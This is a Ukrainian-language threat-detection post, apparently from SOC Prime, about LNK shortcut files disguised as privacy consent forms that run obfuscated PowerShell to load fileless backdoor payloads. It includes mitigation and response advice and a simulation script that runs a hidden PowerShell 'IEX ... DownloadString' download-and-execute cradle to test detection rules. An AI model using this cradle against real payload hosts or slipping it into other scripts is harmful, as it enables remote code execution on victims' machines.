SOC Prime Bias: Високий

19 Jun 2026 07:26 UTC

Що насправді було всередині файлу ярлика, замаскованого під форму згоди на конфіденційність?

Author Photo
SOC Prime Team linkedin icon Стежити
Що насправді було всередині файлу ярлика, замаскованого під форму згоди на конфіденційність?
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зловмисники розповсюджують шкідливі файли LNK, які замасковані під форми згоди на конфіденційність, щоб обманути користувачів та змусити їх відкрити ці файли. Після виконання ці ярлики запускають затемнені команди PowerShell, які завантажують та виконують додаткові завантаження за допомогою технологій без файлової компоненти. Ланцюжок атаки розроблений для крадіжки інформації та розгортання завантажувача бекдора, який допомагає зберігати доступ і стійкість.

Розслідування

Розслідування показало, що файли LNK містять затемнені коди PowerShell, які відповідають за завантаження наступних скриптів. Ці додаткові скрипти включають завантажувач, який отримує корисні навантаження з легітимних веб-сервісів, і завантажувач, який виконує їх безпосередньо в пам’яті. Зловмисник також зловживає Планувальником завдань Windows для збереження стійкості і використовує документи-заспокоєння, щоб шкідлива активність виглядала легітимною.

Мітигація

Організації повинні впроваджувати сувору перевірку розширень файлів та попереджати користувачів про файли LNK, замасковані під звичайні документи. Команди безпеки повинні ретельно моніторити активність Планувальника завдань, журнали виконання PowerShell і вихідні мережеві з’єднання. Також користувачі повинні бути навчені перевіряти як відправника, так і шлях доставки будь-якого вхідного файлу перед відкриттям.

Відповідь

Якщо ця активність виявлена, адміністратори повинні негайно перевірити підозрілі записи Планувальника завдань та незвичне створення скриптів PowerShell у каталогах з доступом користувача. Логи PowerShell повинні бути проаналізовані, а зовнішні з’єднання повинні бути простежені, особливо ті, що стосуються легітимних хмарних платформ або веб-сховищ. Повне судове розслідування має бути проведено на будь-яких виявлених шкідливих скриптах і несанкціонованому мережевому трафіку.

Хід атаки

Виконання симуляції

Попередня умова: має бути пройдено перевірка телеметрії та базової лінії перед польотом.

Обґрунтування: Цей розділ викладає точне виконання техніки супротивника (TTP), розроблене для запуску правила виявлення. Команди та наратив повинні безпосередньо відображати ідентифіковані TTP та націлені на генерування саме тієї телеметрії, що очікується детекційною логікою. Абстрактні або невідповідні приклади призведуть до помилкової діагностики.

  • Опис та команди атаки: Зловмисник намагається встановити початковий доступ і завантажити шкідливий вантаж другого етапу. Щоб уникнути виявлення простими сканерами файлів, вони використовують файл LNK (ярлик). Цей файл LNK складається для виконання powershell.exe у прихованому вікні. Команда, передана PowerShell, використовує Invoke-Expression and DownloadString для завантаження скрипту з віддаленого URL. Це імітує реальні атаки типу “Living-off-the-Land” (LotL), де використовуються легітимні двійкові файли для виконання шкідливих дій, з метою обійти традиційні антивірусні засоби, базовані на сигнатурах.

  • Скрипт регресійного тестування:

    # 1. Визначте цільовий URL (використовуючи нешкідливий сайт для тестування)
    $url = "https://www.google.com"
    
    # 2. Створіть строку шкідливого завантаження PowerShell
    # Ця строка призначена для запуску виявлення 'DownloadString' та 'Invoke-Expression'
    $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')"
    
    # 3. Створіть вміст демонстративного файлу LNK (Симулюється)
    # У реальній атаці це був би бінарний .lnk файл. 
    # Тут ми виконання команди безпосередньо, щоб забезпечити генерацію логу ScriptBlock для валідації.
    Write-Host "[+] Симуляція шкідливого виконання PowerShell через навантаження LNK..."
    powershell.exe -WindowStyle Hidden -Command $payload
    
    Write-Host "[+] Команда симуляції виконана. Проверте Ідентифікатор події 4104."
  • Команди очищення:

    # Видаліть будь-які артефакти, якщо були створені файли
    Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue
    Write-Host "[+] Очищення завершено."